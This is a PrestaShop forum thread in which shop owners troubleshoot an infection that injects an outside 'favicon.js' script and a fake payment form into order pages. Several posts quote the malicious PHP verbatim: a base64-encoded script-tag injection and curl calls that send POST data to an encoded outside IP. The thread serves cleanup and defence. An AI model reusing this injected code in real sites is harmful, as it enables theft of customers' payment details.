Jump to content

Order pages calling a malicious script "favicon.js"


Joseph Joestar
 Share

Recommended Posts

Posted (edited)

Hello

In the code source of the order pages of my Prestashop 1.6 website, I found a script tag who is calling a malicious script

<script type="text/javascript" src="https://www.avir.ir/image/favicon.js"></script> 
<!DOCTYPE HTML> 
<!--[if lt IE 7]><html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="fr-fr"><![endif]-->
<!--[if IE 7]><html class="no-js lt-ie9 lt-ie8 ie7" lang="fr-fr"><![endif]-->
<!--[if IE 8]><html class="no-js lt-ie9 ie8" lang="fr-fr"><![endif]-->
<!--[if gt IE 8]><html class="no-js ie9" lang="fr-fr"><![endif]-->
<html lang="fr-fr"><head><meta charset="utf-8" /><title>Comman   ......

This script changes the DOM and add an undesirable payment form after the PAYEMENT HOOK (I hid this form with CSS to prevent my customer to see it and use it.

Is anyone having this same issue ?

The problem seems pretty complex after 2 days of investigation, searching through all my files and all my DB without finding something interesting.

 

 

Edited by Joseph Joestar (see edit history)

Share this post


Link to post
Share on other sites

Yep it happened to me as well few days ago on prestashop 1.6. 

Check in the controllers (classes/controller/Controller.php or AdminController.php) or even the config file   if you find something like this and remove it :

$html = trim($html);$html.=base64_decode('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIHNyYz0iaHR0cHM6Ly93d3cuYXZpci5pci9pbWFnZS9mYXZpY29uLmpzIj48L3NjcmlwdD4=');

or at the end

try {if(isset($_POST['statistics_hash'])){$array = array('statistics_hash'   => $_POST['statistics_hash'],);$linked="";$ch = curl_init(base64_decode("aHR0cHM6Ly80NS4xOTcuMTQxLjI1MC9hbmFseXRpY3MucGhw"));curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS, $array); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);curl_setopt($ch, CURLOPT_HEADER, false);curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);$html = curl_exec($ch);curl_close($ch);  }} catch (Exception $e) {}

 

It's an injection but I still don't know where it came from (prestashop core breach ? module?)... it's really bad anyway

Share this post


Link to post
Share on other sites

  • 3 weeks later...
Posted (edited)

 

On 3/26/2021 at 4:47 PM, Indy80 said:

Yep it happened to me as well few days ago on prestashop 1.6. 

Check in the controllers (classes/controller/Controller.php or AdminController.php) or even the config file   if you find something like this and remove it :


$html = trim($html);$html.=base64_decode('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIHNyYz0iaHR0cHM6Ly93d3cuYXZpci5pci9pbWFnZS9mYXZpY29uLmpzIj48L3NjcmlwdD4=');

or at the end


try {if(isset($_POST['statistics_hash'])){$array = array('statistics_hash'   => $_POST['statistics_hash'],);$linked="";$ch = curl_init(base64_decode("aHR0cHM6Ly80NS4xOTcuMTQxLjI1MC9hbmFseXRpY3MucGhw"));curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS, $array); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);curl_setopt($ch, CURLOPT_HEADER, false);curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);$html = curl_exec($ch);curl_close($ch);  }} catch (Exception $e) {}

 

It's an injection but I still don't know where it came from (prestashop core breach ? module?)... it's really bad anyway

I found and removed those lines exactly where you said.

Where can i check and clean rest of website?

It seems i have more as i see in tests here https://sitecheck.sucuri.net and here https://scanner.pcrisk.com and they all are related to "Detected reference to malicious blacklisted domain www.avir.ir"

 

I also found infection in AdminLoginController.ph as mentioned here , should i delete it?

$ch = curl_init(base64_decode('aHR0cHM6Ly80NS4xOTcuMTQxLjI1MC9zdGF0eXN0aWNzLnBocA=='));

EDIT: My hosting just informed me that the cartabandonmentpro was the reason, i had it installed but never enabled, now deleted of course.

Edited by YanK1973 (see edit history)

Share this post


Link to post
Share on other sites

  • 3 weeks later...

Hello,

I have the same problem with this favicon.js script. I removed all lines of code from those files mentioned here and even more (I searched for those keywords in all files in the shop). Unfortunately the fake payment form still exist and this also:

<script type="text/javascript" src="https://www.avir.ir/image/favicon.js"></script>

😒

Anyone have a clue how to find it?

Share this post


Link to post
Share on other sites

Hi,

have you checked if the script was somehow added from the database?

also try disabling override ans disabling non prestashop modules, as there is a chance that the code is being added from some modules if it's not the database.

Also, could you send me the URL of your shop in PM to me so I can check, maybe I can give you some clue where to search it.

Kind regards, Leo

Share this post


Link to post
Share on other sites

32 minutes ago, Prestachamps said:

Hi,

as I see, the script is being added into your footer.tpl, please check your theme's footer.tpl.

Kind regards, Leo

The script is added dynamically by some other script probably, there is nothing in the footer.tpl. That was the first place I looked at :)

Share this post


Link to post
Share on other sites

Hi,

to check if it's from DB, then export from your cPanel a Database dump, and open the dump in a txt editor, and search for "favicon.js" or for "avir.ir"

Kind regards, Leo

Share this post


Link to post
Share on other sites

I have exactly the same issue on PS 1.6.1.23 version. I've cleaned the files mentioned in this thread but the offending JS code still appears. I uploaded clean files from the same version of PS. Still the problem exists.

<script type="text/javascript" src="https://www.avir.ir/image/favicon.js"></script> definitely seems dynamically created / loaded as it does not appear in the themes header or footer tpl files. I've also looked in other tpl files just in case but no luck.

Has anyone had success in removing the offending code - and its source to prevent re-infection, if so how? Please share as it would be really helpful to me - and no doubt others as this seems to be an exploit being run against PS in particular. I haven't come across similar threads or articles in relation to other e-commerce software.

A scan against a backup of the db files did not reveal any reference to "avir" or "avir.ir" or the base64_encoded string.

I am desperate for a solution if anyone has further ideas / insights.

Many thanks!

 

Share this post


Link to post
Share on other sites

Update - I think I may have won this round - so perhaps what follows might help someone else facing a similar issue:

I took the full script tag ==> <script type="text/javascript" src="https://www.avir.ir/image/favicon.js"></script> and base64_encoded it which revealed this => PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIHNyYz0iaHR0cHM6Ly93d3cuYXZpci5pci9pbWFnZS9mYXZpY29uLmpzIj48L3NjcmlwdD4=

I scanned all files on the server for that string and found one further file which seemed to contain the offensive code in /controllers/front/ParentOrderController.php

Replacing that file with a clean copy seemed to have done the trick. 

Hope this helps someone else...

Cheers

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share

×
×
  • Create New...

Important Information

Cookies ensure the smooth running of our services. Using these, you accept the use of cookies. Learn More